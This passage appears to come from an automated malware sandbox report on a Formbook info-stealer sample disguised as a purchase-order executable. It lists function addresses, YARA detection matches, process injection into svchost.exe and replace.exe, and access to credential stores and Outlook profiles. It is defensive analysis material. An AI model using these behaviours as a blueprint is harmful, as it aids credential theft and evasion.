            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B801AA4_2_03B801AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B741A24_2_03B741A2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B781CC4_2_03B781CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AB01004_2_03AB0100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B5A1184_2_03B5A118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B481584_2_03B48158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B520004_2_03B52000
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ABC7C04_2_03ABC7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC07704_2_03AC0770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AE47504_2_03AE4750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ADC6E04_2_03ADC6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B805914_2_03B80591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC05354_2_03AC0535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B6E4F64_2_03B6E4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B644204_2_03B64420
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B724464_2_03B72446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B76BD74_2_03B76BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7AB404_2_03B7AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ABEA804_2_03ABEA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC29A04_2_03AC29A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B8A9A64_2_03B8A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AD69624_2_03AD6962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AA68B84_2_03AA68B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AEE8F04_2_03AEE8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ACA8404_2_03ACA840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC28404_2_03AC2840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B3EFA04_2_03B3EFA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ACCFE04_2_03ACCFE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AB2FC84_2_03AB2FC8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B62F304_2_03B62F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B02F284_2_03B02F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AE0F304_2_03AE0F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B34F404_2_03B34F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7CE934_2_03B7CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AD2E904_2_03AD2E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7EEDB4_2_03B7EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7EE264_2_03B7EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC0E594_2_03AC0E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AD8DBF4_2_03AD8DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ABADE04_2_03ABADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B5CD1F4_2_03B5CD1F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ACAD004_2_03ACAD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B60CB54_2_03B60CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AB0CF24_2_03AB0CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC0C004_2_03AC0C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B0739A4_2_03B0739A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7132D4_2_03B7132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AAD34C4_2_03AAD34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC52A04_2_03AC52A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B612ED4_2_03B612ED
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ADB2C04_2_03ADB2C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ACB1B04_2_03ACB1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF516C4_2_03AF516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B8B16B4_2_03B8B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AAF1724_2_03AAF172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7F0E04_2_03B7F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B770E94_2_03B770E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC70C04_2_03AC70C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B6F0CC4_2_03B6F0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7F7B04_2_03B7F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B716CC4_2_03B716CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B056304_2_03B05630
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B5D5B04_2_03B5D5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B895C34_2_03B895C3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B775714_2_03B77571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7F43F4_2_03B7F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AB14604_2_03AB1460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ADFB804_2_03ADFB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B35BF04_2_03B35BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AFDBF94_2_03AFDBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7FB764_2_03B7FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B05AA04_2_03B05AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B61AA34_2_03B61AA3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B5DAAC4_2_03B5DAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B6DAC64_2_03B6DAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B33A6C4_2_03B33A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B77A464_2_03B77A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7FA494_2_03B7FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B559104_2_03B55910
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC99504_2_03AC9950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ADB9504_2_03ADB950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC38E04_2_03AC38E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B2D8004_2_03B2D800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7FFB14_2_03B7FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC1F924_2_03AC1F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A83FD24_2_03A83FD2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03A83FD54_2_03A83FD5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7FF094_2_03B7FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC9EB04_2_03AC9EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ADFDC04_2_03ADFDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B77D734_2_03B77D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AC3D404_2_03AC3D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B71D5A4_2_03B71D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7FCF24_2_03B7FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B39C324_2_03B39C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_032318F04_2_032318F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0322CA304_2_0322CA30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0322AAB04_2_0322AAB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0322C8074_2_0322C807
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0322C8104_2_0322C810
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03234FB04_2_03234FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_032211214_2_03221121
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0323318B4_2_0323318B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_032331904_2_03233190
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0324B6404_2_0324B640
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387E30D4_2_0387E30D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387E1E44_2_0387E1E4
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387D7084_2_0387D708
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387E69C4_2_0387E69C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387C9C84_2_0387C9C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03B2EA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03AAB970 appears 280 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03B07E54 appears 111 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03B3F290 appears 105 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03AF5130 appears 58 times
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: String function: 00445AE0 appears 65 times
            Source: PO2024033194.exe, 00000000.00000003.2156088061.00000000046F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO2024033194.exe
            Source: PO2024033194.exe, 00000000.00000003.2156371265.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO2024033194.exe
            Source: PO2024033194.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/13
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\PO2024033194.exeFile created: C:\Users\user\AppData\Local\Temp\AnglophileJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeCommand line argument: #v0_2_0040D6B0
            Source: PO2024033194.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO2024033194.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: replace.exe, 00000004.00000002.4619808862.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2465032169.0000000003405000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.00000000033FA000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003429000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2462188877.00000000033FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO2024033194.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\PO2024033194.exeFile read: C:\Users\user\Desktop\PO2024033194.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO2024033194.exe "C:\Users\user\Desktop\PO2024033194.exe"
            Source: C:\Users\user\Desktop\PO2024033194.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2024033194.exe"
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO2024033194.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2024033194.exe"Jump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2024033194.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO2024033194.exeStatic file information: File size 1415239 > 1048576
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drBzjAnGBElC.exe, 00000003.00000000.2188627925.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
